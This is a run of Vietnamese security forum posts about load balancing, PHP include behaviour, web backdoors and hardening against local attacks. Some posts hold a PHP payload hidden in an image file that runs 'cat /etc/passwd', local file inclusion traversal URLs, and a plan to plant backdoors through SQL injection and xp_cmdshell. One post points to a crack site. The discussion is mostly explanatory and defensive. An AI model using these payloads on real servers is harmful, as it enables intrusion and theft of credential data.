|
|
Các bác dùng thử thằng này http://haproxy.1wt.eu/, option timeout http-request, cái này chắc đúng ý bác male . Em apply thằng này cho hệ thống đến nay vẫn ổn
|
|
|
ip_vs hoạt động như 1 NAT gateway vì vậy các packet vào ra hoàn toàn không đi qua chain INPUT của netfilter mod connlimit không thể hoạt động hiệu quả với topology hiện nay. Bạn thử nghiệm connlimit ở các chain trước INPUT xem sao, đọc kĩ mối liên hệ giữ ip_vs và netfilter, có gì post kết quả lên để mọi người tham khảo nha. Ngoài ra nếu traffic và các site của bạn không cao. Bạn có thể sử dụng giải pháp haproxy http://haproxy.1wt.eu/. Soft này có ứu điểm về performance( dĩ nhiên không bằng được LVS ), giúp tương tác với packet ở mức application dễ dàng cản lọc, phân luồng traffic web theo ý muốn và bạn hoàn toàn có thể áp dụng connlimit ở topology này
|
|
|
Kiểm mì ăn liền
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 'net.ipv4.ip_forward = 1' >> /etc/sysctl.conf
Nếu có routing phức tạp tìm hiểu thêm command "ip route"
Nếu cần firewall: iptables
-
|
|
|
Haha bạn nên xem kĩ chỗ này "Trường hợp mà GA đưa ra thật ra chỉ là một trường hợp tổng quát chưa có gì rõ ràng nên những đáp án chỉ mang tính tổng quát có thể thật tế phải có nhiều điều chỉnh"
|
|
|
Hàm include không có lỗi gì hết nó được thiết kế để làm mỗi việc "truy tìm các chỉ thị lệnh của PHP và thực thi" nếu các chỉ thị có lỗi thì nó sẽ cảnh báo hoặc không thực thi còn tất cả mọi thứ còn lại trong file đều được đối xử như dạng text và hiển thị bình thường vì đó không phải là các chỉ thị lệnh nên không có việc báo lỗi ở đây, chắc bạn biết dấu hiệu của chỉ thị lệnh PHP như thế nào rồi chứ.Còn vụ NULL code lại là 1 trường hợp khác bạn nên phân biệt rõ chỗ này.
|
|
|
Hì dạo này mấy mod mở nhiều đề tài hấp dẫn quá ta.Hi vọng HVA tiếp tục phát huy hướng này để anh em có nhiều dịp học tập.Trường hợp mà GA đưa ra thật ra chỉ là một trường hợp tổng quát chưa có gì rõ ràng nên những đáp án chỉ mang tính tổng quát có thể thật tế phải có nhiều điều chỉnh.Theo mình thấy thì đây không phải là một trường hợp mới mẻ lắm đáp án đã có từ lâu rồi nhưng xin được tổng hợp thành 2 hướng giải quyết sau:
1)Nếu ứng dụng web dính lỗi SQLinj đồng thời đang chạy dưới quyền sa thì có thể dùng các sp hệ thống của SQLServer vd như: xp_cmdshell để thực hiện các command ftp,tftp,echo .... nhằm tạo backdoor trên server
2)Khai thác triệt để lỗi ứng dụng web chiếm quyền điều khiển webadmin sau đó upload backdoor thông qua các ứng dụng được viết sẵn này
|
|
|
Chính xác là lệnh include của PHP đọc file này hoàn toàn dạng text giống như bạn mở bằng notepad vậy, nó chỉ làm 1 việc duy nhất là truy tìm các chỉ thị lệnh của PHP và thực thi mà không cần quan tâm gì đến cấu trúc file
|
|
|
view source http://www.xprofiles.net/image/abc.JPG
<?php ob_clean(); system("cat /etc/passwd"); end; ?>
|
|
|
Yes!!!!! backdoor là bất cứ thứ gì bạn tạo ra để đạt được mục đích chứ không phải chỉ đơn giản là thực hiện mấy command đã thuộc lòng
|
|
|
Trời các bác vẫn chưa hiểu à
|
|
|
Vẫn còn khả năng đọc file nên việc tiếp tục nâng quyền qua local là có thể.Trường hợp dedicated server thì hiếm ai áp dụng việc bảo mật tối đa như vậy còn trường hợp share hosting thì làm vậy thật hết sức bất tiện
|
|
|
Hehe, bạn xem kĩ lại nội dung của file bug.php
<?php
include(“/home/$file”);
?>
Cái này áp dụng trong trường hợp lỗi local include được phát hiện ra đâu đó trên website chứ không phải cứ upload xong là được
|
|
|
Hì không biết có phải vầy không ta
Trường hợp /image:
http://site.com/bug.php?file=../image/xxx.JPG
Trường hợp /home/image:
http://site.com/bug.php?file=image/xxx.JPG
Xét trường hợp nó tự động chèn thêm đuôi khác sau $file thì sao?
Mấy anh em tiếp đi
|
|
|
Phần mềm này giúp bạn lập catalog cho ổ cứng và thư mục, có chức năng update khi có thay đổi.Mình dùng nó để lập catalog cho đống ebooks, thời gian lập và tìm kiếm cực nhanh.Các bạn đỡ mất thời gian phân loại ) , chúc vui vẻ.
http://www.mtg.sk/rva/Cathy.zip
|
|
|
Đến giờ này còn chưa nhận được mail thông báo gì về hệ thống này cả.Chán.Chẳng lẻ là tấn công website
|
|
|
Bạn dùng chương trình Kaspersky download tại http://dnl-us3.kaspersky-labs.com/trial/registered/IALH5CIN3C6BRF8JWO9X/kav6.0.0.303en.exe
để diệt.Chương trình antivirus này nhẹ hoạt động hiệu quả thích hợp các máy có cấu hình yếu.Crack tìm trên trang http://crackdb.com.
|
|
|
Hì hì vietwow đặt câu hỏi về phía client
|
|
|
Ở đây không chỉ có client truyền packet cho server mà nó còn nhận packet đáp trả nữa.Giao thức HTTP cho phép client mở nhiều kết nối đến server cùng 1 lúc nhằm tận dụng băng thông hiện có giúp việc load web site nhanh hơn.VD: khi truy cập đến http://hvaforum.net thì trên trang index có rất nhiều đối tượng khác được nhúng vào trong như các image,flash ... .Để tối ưu tốc độ client mở nhiều connection , GET cùng lúc các đối tượng nhúng trong trang web.
|
|
|
Tool chỉ check ra lỗi để có cái nhìn tống quan thôi chứ có nhất thiết exploit chính xác đâu . Trong các tool webscanner hiện nay thì acunetix là nhất rồi
|
|
|
to PO:Đây là diễn đàn mà bạn có kiến thức thì cứ chia sẻ cho mọi người cần gì phải PM
CAN hoạt động sniff password theo kĩ thuật arp spoofing một kĩ thuật khá xưa nhưng đến giờ vẫn hiệu quả.Để phòng chống bị đánh lưà điạ MAC cuả gateway trước khi sử dụng mạng bạn nên xác định MAC thực cuả gateway sau đó dùng lệnh ARP -s ip_gateway mac_gateway để gán mac tĩnh tương ứng với ip
|
|
|
Việc bật safemod có thể gây 1 số khó khăn cho người lập trình.Đây là cách chmod tham khảo của Bluehost(host được đánh giá cao về độ thoải mái mà vẫn bảo mật tốt) chống local attack
drwxr-x--x 671 root wheel 16296 Aug 14 15:47 /home/
drwx--x--- 14 user nobody 760 Aug 17 08:10 /home/user
drwxr-xr-x 16 user user 1128 Aug 7 01:12 /home/user/public_html
Ngoài ra để chống local attack còn phải áp dụng nhiều biện pháp khác từ việc config firewall (vd:chống mở port, lấy shell .. ),secure database (vd:mysql có nhiều câu truy vấn nguy hiểm..).Mình nghĩ chống local attack ko phải là việc khó .Các bạn có thể tham khảo các manual cuả php và mysql trong đó có hướng dẫn khá cặn kẽ về việc security này
|
|